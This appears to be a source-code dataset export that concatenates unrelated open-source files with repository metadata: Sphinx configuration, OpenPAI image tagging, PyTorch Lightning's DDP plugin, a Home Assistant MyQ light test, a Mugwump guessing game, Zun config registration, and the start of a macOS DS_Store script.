html_theme = "sphinx_rtd_theme" # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. html_theme_path = [sphinx_rtd_theme.get_html_theme_path()] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. #html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'brugesdoc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ ('index', 'bruges.tex', u'bruges Documentation', u'Evan Bianco, Ben Bougher, Matt Hall', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ('index', 'bruges', u'bruges Documentation', [u'Evan Bianco, Ben Bougher, Matt Hall'], 1) ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ('index', 'bruges', u'bruges Documentation', u'Evan Bianco, Ben Bougher, Matt Hall', 'bruges', 'One line description of project.', 'Miscellaneous'), ] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. #texinfo_no_detailmenu = False
31.69863
88
0.718777
3341a39a2d50bb02f68bc28745b5a404f415e392
1,976
py
Python
pai-management/paiLibrary/paiBuild/image_tag.py
luoch/pai
983326061006954bf3b99988d8698704598392e3
[ "MIT" ]
2
2018-09-13T11:37:28.000Z
2018-09-13T11:39:33.000Z
pai-management/paiLibrary/paiBuild/image_tag.py
luoch/pai
983326061006954bf3b99988d8698704598392e3
[ "MIT" ]
null
null
null
pai-management/paiLibrary/paiBuild/image_tag.py
luoch/pai
983326061006954bf3b99988d8698704598392e3
[ "MIT" ]
1
2018-09-13T11:37:31.000Z
2018-09-13T11:37:31.000Z
# Copyright (c) Microsoft Corporation # All rights reserved. # # MIT License # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated # documentation files (the "Software"), to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and # to permit persons to whom the Software is furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING # BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. import logging import logging.config from ..common import linux_shell from ..common import file_handler from ..common import directory_handler from ..common import docker_handler from ..common import template_handler class image_tag: def __init__(self, image_name, cluster_object_model, docker_cli): self.logger = logging.getLogger(__name__) self.cluster_object_model = cluster_object_model self.image_name = image_name self.tag = self.cluster_object_model['clusterinfo']['dockerregistryinfo']['docker_tag'] self.docker_cli = docker_cli def image_tag(self): self.logger.info("Tag the {0} to the registry".format(self.image_name)) self.docker_cli.image_tag_to_registry( self.image_name, self.tag ) def run(self): self.image_tag()
35.285714
128
0.748482
647ff764f7c89fd5cfc9365c73713971e19f3b64
21,412
py
Python
pytorch_lightning/plugins/training_type/ddp.py
moisutsu/pytorch-lightning
b294c5760eee30a995fcd400127be209b12c4d7c
[ "Apache-2.0" ]
null
null
null
pytorch_lightning/plugins/training_type/ddp.py
moisutsu/pytorch-lightning
b294c5760eee30a995fcd400127be209b12c4d7c
[ "Apache-2.0" ]
null
null
null
pytorch_lightning/plugins/training_type/ddp.py
moisutsu/pytorch-lightning
b294c5760eee30a995fcd400127be209b12c4d7c
[ "Apache-2.0" ]
null
null
null
# Copyright The PyTorch Lightning team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging import os import shutil import signal import subprocess import sys import tempfile import time from pathlib import Path from time import sleep from typing import Any, Dict, List, Optional, Union import __main__ import numpy as np import torch import torch.distributed from torch.nn.parallel.distributed import DistributedDataParallel import pytorch_lightning as pl from pytorch_lightning.core.optimizer import LightningOptimizer from pytorch_lightning.distributed import LightningDistributed from pytorch_lightning.overrides import LightningDistributedModule from pytorch_lightning.overrides.distributed import prepare_for_backward from pytorch_lightning.plugins.environments.cluster_environment import ClusterEnvironment from pytorch_lightning.plugins.io.checkpoint_plugin import CheckpointIO from pytorch_lightning.plugins.training_type.parallel import ParallelPlugin from pytorch_lightning.trainer.states import TrainerFn from pytorch_lightning.utilities import ( _FAIRSCALE_AVAILABLE, _HYDRA_AVAILABLE, _TORCH_GREATER_EQUAL_1_7, _TORCH_GREATER_EQUAL_1_8, _TORCH_GREATER_EQUAL_1_9, _TORCH_GREATER_EQUAL_1_10, rank_zero_deprecation, rank_zero_warn, ) from pytorch_lightning.utilities.distributed import ( distributed_available, init_ddp_connection, rank_zero_only, ReduceOp, sync_ddp_if_available, ) from pytorch_lightning.utilities.exceptions import DeadlockDetectedException, MisconfigurationException from pytorch_lightning.utilities.seed import reset_seed from pytorch_lightning.utilities.types import STEP_OUTPUT if _TORCH_GREATER_EQUAL_1_10: from torch.distributed.optim import DistributedOptimizer, PostLocalSGDOptimizer, ZeroRedundancyOptimizer if _FAIRSCALE_AVAILABLE: from fairscale.optim import OSS if _HYDRA_AVAILABLE: from hydra.core.hydra_config import HydraConfig from hydra.utils import get_original_cwd, to_absolute_path if _TORCH_GREATER_EQUAL_1_8: from pytorch_lightning.utilities.distributed import register_ddp_comm_hook if _TORCH_GREATER_EQUAL_1_10: import torch.distributed.algorithms.ddp_comm_hooks.post_localSGD_hook as post_localSGD import torch.distributed.algorithms.model_averaging.averagers as averagers log = logging.getLogger(__name__) class DDPPlugin(ParallelPlugin): """Plugin for multi-process single-device training on one or multiple nodes. The master process in each node spawns N-1 child processes via :func:`subprocess.Popen`, where N is the number of devices (e.g. GPU) per node. It is very similar to how :mod:`torch.distributed.launch` launches processes. """ distributed_backend = "ddp" def __init__( self, parallel_devices: Optional[List[torch.device]] = None, num_nodes: Optional[int] = None, cluster_environment: Optional[ClusterEnvironment] = None, checkpoint_io: Optional[CheckpointIO] = None, sync_batchnorm: Optional[bool] = None, ddp_comm_state: Optional[object] = None, ddp_comm_hook: Optional[callable] = None, ddp_comm_wrapper: Optional[callable] = None, model_averaging_period: Optional[int] = None, **kwargs: Union[Any, Dict[str, Any]], ) -> None: super().__init__( parallel_devices=parallel_devices, cluster_environment=cluster_environment, checkpoint_io=checkpoint_io, ) self.interactive_ddp_procs = [] if num_nodes is not None: rank_zero_deprecation( "Argument `num_nodes` in `DDPPlugin` is deprecated in v1.4, and will be removed in v1.6." " Notice that it will be overriden by the trainer setting." ) self._num_nodes = num_nodes or 1 if sync_batchnorm is not None: rank_zero_deprecation( "Argument `sync_batchnorm` in `DDPPlugin` is deprecated in v1.4, and will be removed in v1.6." " Notice that it will be overriden by the trainer setting." ) self._sync_batchnorm = sync_batchnorm or False self.dist = LightningDistributed() self.num_processes = len(self.parallel_devices) if self.parallel_devices is not None else 0 self._ddp_kwargs = kwargs self._task_idx = None self._ddp_comm_state = ddp_comm_state self._ddp_comm_hook = ddp_comm_hook self._ddp_comm_wrapper = ddp_comm_wrapper self._model_averaging_period = model_averaging_period self._pids: Optional[List[int]] = None self._sync_dir: Optional[str] = None self.set_world_ranks() @property def is_distributed(self) -> bool: return True @property def root_device(self) -> torch.device: return self.parallel_devices[self.local_rank] @property def num_nodes(self) -> int: return self._num_nodes @num_nodes.setter def num_nodes(self, num_nodes: int) -> None: # note that world ranks is related to num_nodes, when resetting it, need to reset world ranks self._num_nodes = num_nodes self.set_world_ranks() @property def sync_batchnorm(self) -> bool: return self._sync_batchnorm @sync_batchnorm.setter def sync_batchnorm(self, sync_batchnorm: bool) -> None: self._sync_batchnorm = sync_batchnorm @property def task_idx(self) -> Optional[int]: rank_zero_deprecation( f"`{self.__class__.__name__}.task_idx` is deprecated in v1.4 and will be removed in v1.6. Use " f"`{self.__class__.__name__}.local_rank` instead." ) return self._task_idx @task_idx.setter def task_idx(self, task_idx: int) -> None: self._task_idx = task_idx @property def distributed_sampler_kwargs(self): distributed_sampler_kwargs = dict(num_replicas=(self.num_nodes * self.num_processes), rank=self.global_rank) return distributed_sampler_kwargs @property def _is_single_process_single_device(self) -> bool: return True def setup_environment(self) -> None: # start the other scripts if not self.cluster_environment.creates_children(): self._call_children_scripts() # set the task idx self.task_idx = self.cluster_environment.local_rank() self.setup_distributed() def _call_children_scripts(self): # bookkeeping of spawned processes self._check_can_spawn_children() # DDP Environment variables os.environ["MASTER_ADDR"] = self.cluster_environment.master_address() os.environ["MASTER_PORT"] = str(self.cluster_environment.master_port()) # allow the user to pass the node rank os.environ["NODE_RANK"] = str(self.cluster_environment.node_rank()) os.environ["LOCAL_RANK"] = str(self.cluster_environment.local_rank()) # Check if the current calling command looked like `python a/b/c.py` or `python -m a.b.c` # See https://docs.python.org/3/reference/import.html#main-spec if __main__.__spec__ is None: # pragma: no-cover # Script called as `python a/b/c.py` # when user is using hydra find the absolute path path_lib = os.path.abspath if not _HYDRA_AVAILABLE else to_absolute_path # pull out the commands used to run the script and resolve the abs file path command = sys.argv try: full_path = path_lib(command[0]) except Exception: full_path = os.path.abspath(command[0]) command[0] = full_path # use the same python interpreter and actually running command = [sys.executable] + command else: # Script called as `python -m a.b.c` command = [sys.executable, "-m", __main__.__spec__.name] + sys.argv[1:] # the visible devices tell us how many GPUs we want to use. # when the trainer script was called the device has already been scoped by the time # code reaches this point. so, to call the scripts, we need to leave cuda visible devices alone # but forward the GPUs selected via environment variables if self.parallel_devices is None: raise MisconfigurationException("you selected (distribute_backend = ddp) but did not set Trainer(gpus=?)") os.environ["WORLD_SIZE"] = f"{self.num_processes * self.num_nodes}" self.interactive_ddp_procs = [] for local_rank in range(1, self.num_processes): env_copy = os.environ.copy() env_copy["LOCAL_RANK"] = f"{local_rank}" # remove env var if global seed not set if os.environ.get("PL_GLOBAL_SEED") is None and "PL_GLOBAL_SEED" in env_copy: del env_copy["PL_GLOBAL_SEED"] # start process # if hydra is available and initialized, make sure to set the cwd correctly cwd: Optional[str] = None if _HYDRA_AVAILABLE: if HydraConfig.initialized(): cwd = get_original_cwd() os_cwd = f'"{os.getcwd()}"' command += [f"hydra.run.dir={os_cwd}", f"hydra.job.name=train_ddp_process_{local_rank}"] proc = subprocess.Popen(command, env=env_copy, cwd=cwd) self.interactive_ddp_procs.append(proc) # starting all processes at once can cause issues # with dataloaders delay between 1-10 seconds delay = np.random.uniform(1, 5, 1)[0] sleep(delay) def setup_distributed(self): reset_seed() # determine which process we are and world size self.set_world_ranks() # set warning rank rank_zero_only.rank = self.global_rank # set up server using proc 0's ip address # try to init for 20 times at max in case ports are taken # where to store ip_table init_ddp_connection(self.cluster_environment, self.torch_distributed_backend) # set the ranks and devices self.dist.rank = self.global_rank self.dist.device = self.root_device def _check_can_spawn_children(self): if self.local_rank != 0: raise RuntimeError( "Lightning attempted to launch new distributed processes with `local_rank > 0`. This should not happen." " Possible reasons: 1) LOCAL_RANK environment variable was incorrectly modified by the user," " 2) `ClusterEnvironment.creates_children()` incorrectly implemented." ) def set_world_ranks(self) -> None: if self.cluster_environment is None: return self.cluster_environment.set_global_rank(self.node_rank * self.num_processes + self.local_rank) self.cluster_environment.set_world_size(self.num_nodes * self.num_processes) rank_zero_only.rank = self.cluster_environment.global_rank() def pre_configure_ddp(self): # if unset, default `find_unused_parameters` `True` # Many models require setting this parameter to True, as there are corner cases # when not all parameter backward hooks are fired by the autograd engine even if require_grad is set to True. # This flag does come with a performance hit, so it is suggested to disable in cases where it is possible. self._ddp_kwargs["find_unused_parameters"] = self._ddp_kwargs.get("find_unused_parameters", True) # todo: PyTorch 1.7.0 DDP introduces `self.reducer._rebuild_buckets()` breaking manual_optimization if ( _TORCH_GREATER_EQUAL_1_7 and not self.lightning_module.automatic_optimization and not self._ddp_kwargs.get("find_unused_parameters", False) ): rank_zero_warn( "From PyTorch 1.7.0, Lightning ``manual_optimization`` needs to set ``find_unused_parameters=True`` " "to properly work with DDP." ) self._ddp_kwargs["find_unused_parameters"] = True def _register_ddp_hooks(self) -> None: # In 1.8, DDP communication hooks only work with NCCL backend and SPSD (single process single device) mode # Since 1.9, DDP communication hooks can work on all backends. if _TORCH_GREATER_EQUAL_1_9 or ( _TORCH_GREATER_EQUAL_1_8 and self.on_gpu and self._is_single_process_single_device ): register_ddp_comm_hook( model=self._model, ddp_comm_state=self._ddp_comm_state, ddp_comm_hook=self._ddp_comm_hook, ddp_comm_wrapper=self._ddp_comm_wrapper, ) if ( _TORCH_GREATER_EQUAL_1_10 and isinstance(self._ddp_comm_state, post_localSGD.PostLocalSGDState) and self.lightning_module.trainer.state.fn == TrainerFn.FITTING ): self._reinit_optimizers_with_post_localSGD(self._ddp_comm_state.start_localSGD_iter) def _reinit_optimizers_with_post_localSGD(self, warmup_steps: int): optimizers = self.lightning_module.trainer.optimizers if self._model_averaging_period is None: raise ValueError( "Post-localSGD algorithm is used, but model averaging period is not provided to DDP plugin." ) averager = averagers.PeriodicModelAverager(period=self._model_averaging_period, warmup_steps=warmup_steps) for x, optimizer in enumerate(optimizers): if isinstance(optimizer, LightningOptimizer): optimizer = optimizer._optimizer if ( isinstance(optimizer, DistributedOptimizer) or isinstance(optimizer, ZeroRedundancyOptimizer) or (_FAIRSCALE_AVAILABLE and isinstance(optimizer, OSS)) ): raise ValueError( f"Cannot wrap a distributed optimizer of type {optimizer.__name__} by PostLocalSGDOptimizer." ) if isinstance(optimizer, PostLocalSGDOptimizer): continue optim_class = type(optimizer) post_localSGD_optimizer = PostLocalSGDOptimizer( params=optimizer.param_groups, optimizer_class=optim_class, averager=averager, **optimizer.defaults, ) optimizers[x] = post_localSGD_optimizer del optimizer trainer = self.lightning_module.trainer trainer.optimizers = optimizers trainer.convert_to_lightning_optimizers() def configure_ddp(self) -> None: self.pre_configure_ddp() self._model = DistributedDataParallel( LightningDistributedModule(self.model), device_ids=self.determine_ddp_device_ids(), **self._ddp_kwargs ) self._register_ddp_hooks() def determine_ddp_device_ids(self): if self.root_device.type == "cpu": return None return [self.root_device.index] def pre_dispatch(self): # share ddp pids to all processes self._share_information_to_prevent_deadlock() # move the model to the correct device self.model_to_device() if self.sync_batchnorm: self.model = self.configure_sync_batchnorm(self.model) # skip wrapping the model if we are not fitting as no gradients need to be exchanged trainer_fn = self.lightning_module.trainer.state.fn if trainer_fn == TrainerFn.FITTING: self.configure_ddp() def post_dispatch(self, trainer: "pl.Trainer") -> None: self.cluster_environment.teardown() def barrier(self, *args, **kwargs) -> None: if not distributed_available(): return if _TORCH_GREATER_EQUAL_1_8 and torch.distributed.get_backend() == "nccl": torch.distributed.barrier(device_ids=self.determine_ddp_device_ids()) else: torch.distributed.barrier() def broadcast(self, obj: object, src: int = 0) -> object: return self.dist.broadcast(obj) def pre_backward(self, closure_loss: torch.Tensor) -> None: """Run before precision plugin executes backward.""" if not self.lightning_module.automatic_optimization: prepare_for_backward(self.model, closure_loss) def model_to_device(self): self.model.to(self.root_device) def reduce(self, tensor, group: Optional[Any] = None, reduce_op: Union[ReduceOp, str] = "mean") -> torch.Tensor: """Reduces a tensor from several distributed processes to one aggregated tensor. Args: tensor: the tensor to sync and reduce group: the process group to gather results from. Defaults to all processes (world) reduce_op: the reduction operation. Defaults to 'mean'/'avg'. Can also be a string 'sum' to calculate the sum during reduction. Return: reduced value, except when the input was not a tensor the output remains is unchanged """ if isinstance(tensor, torch.Tensor): tensor = sync_ddp_if_available(tensor, group, reduce_op=reduce_op) return tensor def training_step(self, *args, **kwargs) -> Optional[Any]: return self.model(*args, **kwargs) def validation_step(self, *args, **kwargs) -> Optional[STEP_OUTPUT]: if isinstance(self.model, DistributedDataParallel): # used when calling `trainer.fit` return self.model(*args, **kwargs) else: # used when calling `trainer.validate` return self.lightning_module.validation_step(*args, **kwargs) def test_step(self, *args, **kwargs) -> Optional[STEP_OUTPUT]: return self.lightning_module.test_step(*args, **kwargs) def predict_step(self, *args, **kwargs) -> Any: return self.lightning_module.predict_step(*args, **kwargs) def post_training_step(self): if not self.lightning_module.automatic_optimization: self.model.require_backward_grad_sync = True @classmethod def register_plugins(cls, plugin_registry: Dict) -> None: plugin_registry.register( "ddp_find_unused_parameters_false", cls, description="DDP Plugin with `find_unused_parameters` as False", find_unused_parameters=False, ) def _share_information_to_prevent_deadlock(self): self._share_pids() # there should be a unique sync_dir per nodes. if self.local_rank == 0: # create a temporary directory used to synchronize processes on deadlock. self._sync_dir = tempfile.mkdtemp() sync_dirs = [] global_node_rank_zero = 0 for _ in range(self.num_nodes): sync_dirs.append(self.broadcast(self._sync_dir, global_node_rank_zero)) global_node_rank_zero += self.world_size // self.num_nodes self._sync_dir = sync_dirs[self.node_rank] def _share_pids(self): """Make all DDP processes aware of all processes pids.""" self.barrier() pids = self.all_gather(torch.tensor(os.getpid(), device=self.root_device)) pids = pids.cpu().numpy().tolist() self._pids = pids if isinstance(pids, list) else [pids] def reconciliate_processes(self, trace: str): if self.world_size < 2: return sync_dir = self._sync_dir if not sync_dir: rank_zero_warn("Error handling mechanism for deadlock detection is uninitialized. Skipping check.") return # The cluster may be configured to periodically purge the `/tmp` # directory, in which case `sync_dir` may not exist anymore at this # point. Idempotently create it to ensure its existence. Path(sync_dir).mkdir(parents=True, exist_ok=True) # save a file locally. torch.save(True, os.path.join(sync_dir, f"{self.global_rank}.pl")) # sleep for a short time time.sleep(3) # return if all processes wrote a file in the `sync_dir`. # todo (tchaton) Add support for non-shared file-system which will fail. if len(os.listdir(sync_dir)) == (self.world_size // self.num_nodes): return for pid in self._pids: if pid != os.getpid(): os.kill(pid, signal.SIGKILL) shutil.rmtree(sync_dir) raise DeadlockDetectedException(f"DeadLock detected from rank: {self.global_rank} \n {trace}") def teardown(self) -> None: if isinstance(self.model, DistributedDataParallel): self.model = self.lightning_module if self.on_gpu: # GPU teardown self.lightning_module.cpu() # clean up memory torch.cuda.empty_cache()
41.097889
120
0.671726
c7b3dbc84279231bb9c8dd66ab4e26633c400572
1,116
py
Python
tests/components/myq/test_light.py
MrDelik/core
93a66cc357b226389967668441000498a10453bb
[ "Apache-2.0" ]
22,481
2020-03-02T13:09:59.000Z
2022-03-31T23:34:28.000Z
tests/components/myq/test_light.py
MrDelik/core
93a66cc357b226389967668441000498a10453bb
[ "Apache-2.0" ]
31,101
2020-03-02T13:00:16.000Z
2022-03-31T23:57:36.000Z
tests/components/myq/test_light.py
MrDelik/core
93a66cc357b226389967668441000498a10453bb
[ "Apache-2.0" ]
11,411
2020-03-02T14:19:20.000Z
2022-03-31T22:46:07.000Z
"""The scene tests for the myq platform.""" from homeassistant.const import STATE_OFF, STATE_ON from .util import async_init_integration async def test_create_lights(hass): """Test creation of lights.""" await async_init_integration(hass) state = hass.states.get("light.garage_door_light_off") assert state.state == STATE_OFF expected_attributes = { "friendly_name": "Garage Door Light Off", "supported_features": 0, } # Only test for a subset of attributes in case # HA changes the implementation and a new one appears assert all( state.attributes[key] == expected_attributes[key] for key in expected_attributes ) state = hass.states.get("light.garage_door_light_on") assert state.state == STATE_ON expected_attributes = { "friendly_name": "Garage Door Light On", "supported_features": 0, } # Only test for a subset of attributes in case # HA changes the implementation and a new one appears assert all( state.attributes[key] == expected_attributes[key] for key in expected_attributes )
30.162162
88
0.694444
c9c4d292d0f00f4468fe62f0502c48da5e0a1711
964
py
Python
samples/py.py
mliscourtney/vim256colorschemes
17c060fec90fb0afd3b638776277e88935e2f21f
[ "MIT" ]
1
2015-12-29T19:56:18.000Z
2015-12-29T19:56:18.000Z
samples/py.py
mliscourtney/vim256colorschemes
17c060fec90fb0afd3b638776277e88935e2f21f
[ "MIT" ]
null
null
null
samples/py.py
mliscourtney/vim256colorschemes
17c060fec90fb0afd3b638776277e88935e2f21f
[ "MIT" ]
null
null
null
#!/usr/bin/env python import random random.seed() mugwump_x = random.randrange(10) mugwump_y = random.randrange(10) units_from_mugwump = 1 turn_number = 0 while units_from_mugwump and turn_number < 10: guess = map(int, raw_input("What is your guess (x y)? ").split()) if not all(0 <= values < 10 for values in guess): print "Please enter numbers in the range 0 and", 10 - 1 continue if len(guess) != 2: print "Please only enter two numbers" continue else: guess_x = guess[0] guess_y = guess[1] units_from_mugwump = abs(guess_x - mugwump_x) + abs(guess_y - mugwump_y) print "You are", units_from_mugwump, "units from the Mugwump." turn_number += 1 print "Turn number", turn_number if units_from_mugwump == 0: print "You win! The Mugwump is at (", mugwump_x, ",", mugwump_y, ")." else: print "You lose. The Mugwump is at (", mugwump_x, ",", mugwump_y, ")."
32.133333
80
0.637967
93cba62fc9a46bb5cb5c1354c9d545719b7e3849
2,091
py
Python
zun-3.0.0/zun/conf/__init__.py
scottwedge/OpenStack-Stein
7077d1f602031dace92916f14e36b124f474de15
[ "Apache-2.0" ]
null
null
null
zun-3.0.0/zun/conf/__init__.py
scottwedge/OpenStack-Stein
7077d1f602031dace92916f14e36b124f474de15
[ "Apache-2.0" ]
5
2019-08-14T06:46:03.000Z
2021-12-13T20:01:25.000Z
zun-3.0.0/zun/conf/__init__.py
scottwedge/OpenStack-Stein
7077d1f602031dace92916f14e36b124f474de15
[ "Apache-2.0" ]
2
2020-03-15T01:24:15.000Z
2020-07-22T20:34:26.000Z
# All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from zun.conf import api from zun.conf import availability_zone from zun.conf import cinder_client from zun.conf import compute from zun.conf import container_driver from zun.conf import database from zun.conf import docker from zun.conf import glance_client from zun.conf import image_driver from zun.conf import keystone from zun.conf import netconf from zun.conf import network from zun.conf import neutron_client from zun.conf import path from zun.conf import pci from zun.conf import profiler from zun.conf import quota from zun.conf import scheduler from zun.conf import services from zun.conf import ssl from zun.conf import utils from zun.conf import volume from zun.conf import websocket_proxy from zun.conf import zun_client CONF = cfg.CONF api.register_opts(CONF) compute.register_opts(CONF) container_driver.register_opts(CONF) database.register_opts(CONF) docker.register_opts(CONF) glance_client.register_opts(CONF) image_driver.register_opts(CONF) keystone.register_opts(CONF) path.register_opts(CONF) scheduler.register_opts(CONF) services.register_opts(CONF) zun_client.register_opts(CONF) ssl.register_opts(CONF) profiler.register_opts(CONF) neutron_client.register_opts(CONF) network.register_opts(CONF) websocket_proxy.register_opts(CONF) pci.register_opts(CONF) quota.register_opts(CONF) volume.register_opts(CONF) cinder_client.register_opts(CONF) netconf.register_opts(CONF) availability_zone.register_opts(CONF) utils.register_opts(CONF)
30.75
78
0.812052
ff920e6b3abe5f46a8ead655592fc7794e61c8d1
3,717
py
Python
contrib/macdeploy/custom_dsstore.py
Apiocoin/litecoin
779be6dc6f0fa3f8c8eefad4cd487f2f9f9e3c69
[ "MIT" ]
3
2021-06-08T00:07:01.000Z
2021-06-09T17:53:44.000Z
contrib/macdeploy/custom_dsstore.py
Apiocoin/litecoin
779be6dc6f0fa3f8c8eefad4cd487f2f9f9e3c69
[ "MIT" ]
null
null
null
contrib/macdeploy/custom_dsstore.py
Apiocoin/litecoin
779be6dc6f0fa3f8c8eefad4cd487f2f9f9e3c69
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2013-2018 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. import biplist from ds_store import DSStore from mac_alias import Alias import sys output_file = sys.argv[1] package_name_ns = sys.argv[2] ds = DSStore.open(output_file, 'w+') ds['.']['bwsp'] = { 'ShowStatusBar': False, 'WindowBounds': '{{300, 280}, {500, 343}}', 'ContainerShowSidebar': False, 'SidebarWidth': 0, 'ShowTabView': False, 'PreviewPaneVisibility': False, 'ShowToolbar': False, 'ShowSidebar': False, 'ShowPathbar': True } icvp = { 'gridOffsetX': 0.0, 'textSize': 12.0, 'viewOptionsVersion': 1, 'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07bitcoin\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00', 